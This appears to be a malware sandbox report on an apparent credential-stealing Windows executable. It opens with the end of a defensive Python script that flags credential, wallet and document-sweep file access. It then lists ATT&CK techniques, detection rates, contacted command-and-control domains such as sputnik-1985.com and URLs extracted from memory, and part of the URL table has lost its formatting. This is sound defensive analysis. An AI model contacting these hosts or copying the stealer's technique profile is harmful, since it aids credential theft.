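        return "suspicious: " + theft[0]
    return "no stealer indicators"


def triage(text):
    events = parse_events(text)
    hits = classify(events)
    return {"event_count": len(events), "hits": hits, "verdict": verdict(hits)}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    print(result["verdict"])
    for name, paths in result["hits"].items():
        print(f"{name}: {len(paths)} distinct path(s)")
        for path in paths:
            print("   ", path)
```

Run against the twelve sample lines the script reports all three theft categories plus the Documents sweep; feeding it the full behaviour section of a report, or the equivalent file-open events from an EDR, gives the same grouping per source process. The Documents enumeration is kept as its own category because on its own it is common to legitimate software; it only adds weight once credential or wallet paths are also present.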

            Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: xNuh0DUJaG.exe PID: 7464, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Mitre Att&ck Matrix (matched signature count in parentheses; techniques without a count had no matching signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (1); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (1); Process Injection (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (11); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (2); System Information Discovery (22); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (31); Clipboard Data (2); Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
xNuh0DUJaG.exe | 49% | Virustotal |
xNuh0DUJaG.exe | 47% | ReversingLabs | Win32.Trojan.CrypterX
xNuh0DUJaG.exe | 100% | Avira | HEUR/AGEN.1306978
xNuh0DUJaG.exe | 100% | Joe Sandbox ML |

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://sputnik-1985.com/apiOSCz | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apieB | 100% | Avira URL Cloud | malware
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
sputnik-1985.com | 104.21.80.1 | true | false | | high
femalsabler.shop | unknown | unknown | true | | unknown
robinsharez.shop | unknown | unknown | true | | unknown
soundtappysk.shop | unknown | unknown | true | | unknown
crowdwarek.shop | unknown | unknown | true | | unknown
versersleep.shop | unknown | unknown | true | | unknown
skidjazzyric.click | unknown | unknown | false | | high
chipdonkeruz.shop | unknown | unknown | true | | unknown
apporholis.shop | unknown | unknown | true | | unknown
handscreamny.shop | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
robinsharez.shop | false | | high
crowdwarek.shop | false | | high
skidjazzyric.click | false | | high
https://sputnik-1985.com/api | false | | high
femalsabler.shop | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
soundtappysk.shop | false | | high
apporholis.shop | false | | high
chipdonkeruz.shop | false | | high
versersleep.shop | false | | high
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://player.vimeo.com | xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gstatic.cn/recaptcha/ | xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com | xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp
                                                                          high
                                                                          https://www.google.comxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackxNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englxNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://s.ytimg.com;xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://steam.tv/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://steamcommunity.com/pxNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://store.steampowered.com/privacy_agreement/xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/points/shop/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://ocsp.rootca1.amazontrust.com0:xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&axNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://sketchfab.comxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://lv.queniujq.cnxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brxNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.youtube.com/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://sputnik-1985.com/apieBxNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://store.steampowered.com/privacy_agreement/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_AxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://sputnik-1985.com/xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000568000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000566000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/recaptcha/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://checkout.steampowered.com/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/;xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/about/xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/my/wishlist/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://help.steampowered.com/en/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/market/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/news/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://recaptcha.net/recaptcha/;xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=enxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://steamcommunity.com/discussions/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
https://sputnik-1985.com/apiOSCz | Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus detection: Avira URL Cloud: malware | Reputation: unknown
https://store.steampowered.com/stats/ | Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://medal.tv | Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://broadcast.st.dl.eccdnx.com | Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
